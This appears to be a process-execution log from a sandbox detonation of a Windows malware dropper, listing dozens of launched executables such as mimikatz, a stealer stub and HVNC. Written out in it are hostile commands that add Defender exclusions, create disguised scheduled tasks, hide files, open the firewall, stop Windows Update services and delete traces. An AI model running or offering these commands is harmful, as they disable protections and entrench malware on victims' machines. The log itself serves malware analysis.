"C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
C:\Users\Admin\AppData\Local\Temp\890517074.exe
C:\Users\Admin\AppData\Local\Temp\890517074.exe
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{E043A5E7-D2FF-4F8B-A317-35ECB09050EF}"
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\Server.exe
C:\Users\Admin\AppData\Local\Temp/Server.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Windows\explorer.exe
explorer.exe
C:\ProgramData\jmqid\ljid.exe
C:\ProgramData\jmqid\ljid.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\Files\Vhpcde.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Vhpcde.exe"
C:\Users\Admin\AppData\Local\Temp\Files\r.exe
"C:\Users\Admin\AppData\Local\Temp\Files\r.exe"
C:\Users\Admin\AppData\Local\Temp\Files\TT18.exe
"C:\Users\Admin\AppData\Local\Temp\Files\TT18.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\gZtXpepbYS'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
C:\Users\Admin\AppData\Local\Temp\Files\anne.exe
"C:\Users\Admin\AppData\Local\Temp\Files\anne.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\131.0.6778.140_chrome_installer.exe
"C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\131.0.6778.140_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\guiF495.tmp"
C:\gZtXpepbYS\u6V4s1Fv.exe
"C:\gZtXpepbYS\u6V4s1Fv.exe"
C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\CR_9552F.tmp\setup.exe
"C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\CR_9552F.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\CR_9552F.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\guiF495.tmp"
C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\CR_9552F.tmp\setup.exe
"C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\CR_9552F.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.140 --initial-client-data=0x26c,0x270,0x274,0x1d8,0x278,0x7ff7511e5d68,0x7ff7511e5d74,0x7ff7511e5d80
C:\Users\Admin\AppData\Local\Temp\Files\main.exe
"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"
C:\Users\Admin\AppData\Local\Temp\Files\main.exe
"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\Files\clcs.exe
"C:\Users\Admin\AppData\Local\Temp\Files\clcs.exe"
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
C:\Users\Admin\AppData\Local\Temp\Files\d8rb24m3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\d8rb24m3.exe"
C:\Users\Admin\AppData\Local\Temp\Files\2klz.exe
"C:\Users\Admin\AppData\Local\Temp\Files\2klz.exe"
C:\Users\Admin\AppData\Local\Temp\Files\s.exe
"C:\Users\Admin\AppData\Local\Temp\Files\s.exe"
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
C:\Users\Admin\AppData\Local\Temp\Files\yellow-rose.exe
"C:\Users\Admin\AppData\Local\Temp\Files\yellow-rose.exe"
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RTA0M0E1RTctRDJGRi00RjhCLUEzMTctMzVFQ0IwOTA1MEVGfSIgdXNlcmlkPSJ7MzIxRTBEMEYtMEVEQy00Q0I2LUIwMUQtQzkyMEY2RTg5RDUxfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezkzQUZFRDAyLTJCOEUtNDQ1Qy04MTIwLUYzODVFNzc0NjYyOX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNDLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTMxLjAuNjc3OC4xNDAiIGFwPSJ4NjQtc3RhYmxlLXN0YXRzZGVmXzEiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iNjYiIGlpZD0ie0RCMjRFREQzLTk5MjAtNUQ1Ri1GQkJFLThFNzQzRjc0ODZDMX0iIGNvaG9ydD0iMTpndS9pMTk6IiBjb2hvcnRuYW1lPSJTdGFibGUgSW5zdGFsbHMgJmFtcDsgVmVyc2lvbiBQaW5zIj48ZXZlbnQgZXZlbnR0eXBlPSI5IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGRvd25sb2FkZXI9Indpbmh0dHAiIHVybD0iaHR0cDovL2VkZ2VkbC5tZS5ndnQxLmNvbS9lZGdlZGwvcmVsZWFzZTIvY2hyb21lL2NwaWhkZ2FrbnU2MndudW9rcDZ0ZG5vY2xhXzEzMS4wLjY3NzguMTQwLzEzMS4wLjY3NzguMTQwX2Nocm9tZV9pbnN0YWxsZXIuZXhlIiBkb3dubG9hZGVkPSIxMTYwMzI4ODAiIHRvdGFsPSIxMTYwMzI4ODAiIGRvd25sb2FkX3RpbWVfbXM9IjE3NjMyIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjYiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iNiIgZXJyb3Jjb2RlPSIxMiIgZXh0cmFjb2RlMT0iMCIgc291cmNlX3VybF9pbmRleD0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjY1OCIgZG93bmxvYWRfdGltZV9tcz0iMjA4OTQiIGRvd25sb2FkZWQ9IjExNjAzMjg4MCIgdG90YWw9IjExNjAzMjg4MCIgaW5zdGFsbF90aW1lX21zPSIyNDA1NSIvPjwvYXBwPjwvcmVxdWVzdD4
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\gZtXpepbYS\u6V4s1Fv.exe" & rd /s /q "C:\ProgramData\EGIDAAFIEHIE" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\Files\eps9m380cn.exe
"C:\Users\Admin\AppData\Local\Temp\Files\eps9m380cn.exe"
C:\Users\Admin\AppData\Local\Temp\Files\eps9m380cn.exe
"C:\Users\Admin\AppData\Local\Temp\Files\eps9m380cn.exe"
C:\Users\Admin\AppData\Local\Temp\Server.exe
C:\Users\Admin\AppData\Local\Temp/Server.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\ProgramData\jmqid\ljid.exe
C:\ProgramData\jmqid\ljid.exe
C:\Users\Admin\AppData\Local\Temp\Files\r42aoop5.exe
"C:\Users\Admin\AppData\Local\Temp\Files\r42aoop5.exe"
C:\Users\Admin\AppData\Local\Temp\Files\gU8ND0g.exe
"C:\Users\Admin\AppData\Local\Temp\Files\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Users\Admin\AppData\Local\Temp\Files\NVIDIA.exe
"C:\Users\Admin\AppData\Local\Temp\Files\NVIDIA.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4940 -ip 4940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 1432
C:\Users\Admin\AppData\Local\Temp\Files\svcyr.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svcyr.exe"
C:\Windows\tynbyc.exe
C:\Windows\tynbyc.exe
C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe
"C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe"
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 6616 -ip 6616
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6616 -s 648
C:\Users\Admin\AppData\Local\Temp\Files\test22.exe
"C:\Users\Admin\AppData\Local\Temp\Files\test22.exe"
C:\Windows\tynbyc.exe
C:\Windows\tynbyc.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\Server.exe
C:\Users\Admin\AppData\Local\Temp/Server.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\ProgramData\jmqid\ljid.exe
C:\ProgramData\jmqid\ljid.exe
C:\Users\Admin\AppData\Local\Temp\Files\248364651.exe
"C:\Users\Admin\AppData\Local\Temp\Files\248364651.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 872
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Windows\tynbyc.exe
C:\Windows\tynbyc.exe
C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe
"C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe"
C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe
"C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe"
C:\Users\Admin\AppData\Local\Temp\Files\WindowsUI.exe
"C:\Users\Admin\AppData\Local\Temp\Files\WindowsUI.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Users\Admin\AppData\Local\Temp\Files\noll.exe
"C:\Users\Admin\AppData\Local\Temp\Files\noll.exe"
C:\Users\Admin\AppData\Local\Temp\Files\putty.exe
"C:\Users\Admin\AppData\Local\Temp\Files\putty.exe"
C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"
C:\Users\Admin\AppData\Local\Temp\Files\dujkgsf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dujkgsf.exe"
C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2980 -ip 2980
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 728
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\Server.exe
C:\Users\Admin\AppData\Local\Temp/Server.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\ProgramData\jmqid\ljid.exe
C:\ProgramData\jmqid\ljid.exe
C:\Users\Admin\AppData\Local\Temp\Files\ardara.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ardara.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Reaper%20cfx%20Spoofer%20V2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Reaper%20cfx%20Spoofer%20V2.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cfx.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cfx.exe
C:\Users\Admin\AppData\Local\Temp\Files\heo.exe
"C:\Users\Admin\AppData\Local\Temp\Files\heo.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 808
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"; Add-MpPreference -ExclusionProcess "softina.exe"; exit"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\Server.exe
C:\Users\Admin\AppData\Local\Temp/Server.exe
C:\ProgramData\jmqid\ljid.exe
C:\ProgramData\jmqid\ljid.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5960 -ip 5960
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5960 -ip 5960
C:\Users\Admin\AppData\Local\Temp\Files\Server.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Server.exe"
C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe
"C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 3808 -ip 3808
C:\Users\Admin\AppData\Local\Temp\Files\HVNC1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\HVNC1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\SrbijaSetupHokej.exe
"C:\Users\Admin\AppData\Local\Temp\Files\SrbijaSetupHokej.exe"
C:\Users\Admin\AppData\Local\Temp\Files\lega.exe
"C:\Users\Admin\AppData\Local\Temp\Files\lega.exe"
C:\Users\Admin\AppData\Local\Temp\Files\t1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /c
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /cr
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe"
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe"
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource core
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /report "C:\Program Files (x86)\Google\Temp\5f01f945-471f-4eb3-94e4-295351ee3240.dmp" /machine
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 576 -ip 576
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\Server.exe
C:\Users\Admin\AppData\Local\Temp/Server.exe
C:\ProgramData\jmqid\ljid.exe
C:\ProgramData\jmqid\ljid.exe
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe"
C:\Users\Admin\AppData\Local\Temp\Server.exe
C:\Users\Admin\AppData\Local\Temp/Server.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\ProgramData\jmqid\ljid.exe
C:\ProgramData\jmqid\ljid.exe
C:\Users\Admin\AppData\Local\Temp\Server.exe
C:\Users\Admin\AppData\Local\Temp/Server.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\ProgramData\jmqid\ljid.exe
C:\ProgramData\jmqid\ljid.exe
C:\Users\Admin\AppData\Local\Temp\Files\mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\Files\mimikatz.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Server.exe" "Server.exe" ENABLE
C:\Users\Admin\AppData\Local\Temp\Files\t.exe
"C:\Users\Admin\AppData\Local\Temp\Files\t.exe"
C:\Users\Admin\AppData\Local\Temp\Files\file.exe
"C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
C:\Users\Admin\AppData\Local\Temp\Files\lummnew.exe
"C:\Users\Admin\AppData\Local\Temp\Files\lummnew.exe"
C:\Users\Admin\AppData\Local\Temp\Files\jy.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jy.exe"
C:\Users\Admin\AppData\Local\Temp\is-VCIE0.tmp\jy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VCIE0.tmp\jy.tmp" /SL5="$103A6,1888137,52736,C:\Users\Admin\AppData\Local\Temp\Files\jy.exe"
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\ProgramData\jmqid\ljid.exe
C:\ProgramData\jmqid\ljid.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5780 -ip 5780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 5780 -ip 5780
C:\Users\Admin\AppData\Local\Temp\Files\shttpsr_mg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\shttpsr_mg.exe"
C:\Users\Admin\AppData\Local\Temp\Files\5447jsX.exe
"C:\Users\Admin\AppData\Local\Temp\Files\5447jsX.exe"
C:\Users\Admin\AppData\Local\Temp\Files\basx.exe
"C:\Users\Admin\AppData\Local\Temp\Files\basx.exe"
C:\Users\Admin\AppData\Local\Temp\Files\hiya.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hiya.exe"
C:\Users\Admin\AppData\Local\Temp\Files\PHJG9876789000.exe
"C:\Users\Admin\AppData\Local\Temp\Files\PHJG9876789000.exe"
C:\Users\Admin\AppData\Local\Temp\Files\9402.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\9402.tmp.exe"
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
"C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\cmd.exe
cmd.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\ProgramData\jmqid\ljid.exe
C:\ProgramData\jmqid\ljid.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
"C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\cmd.exe
cmd.exe
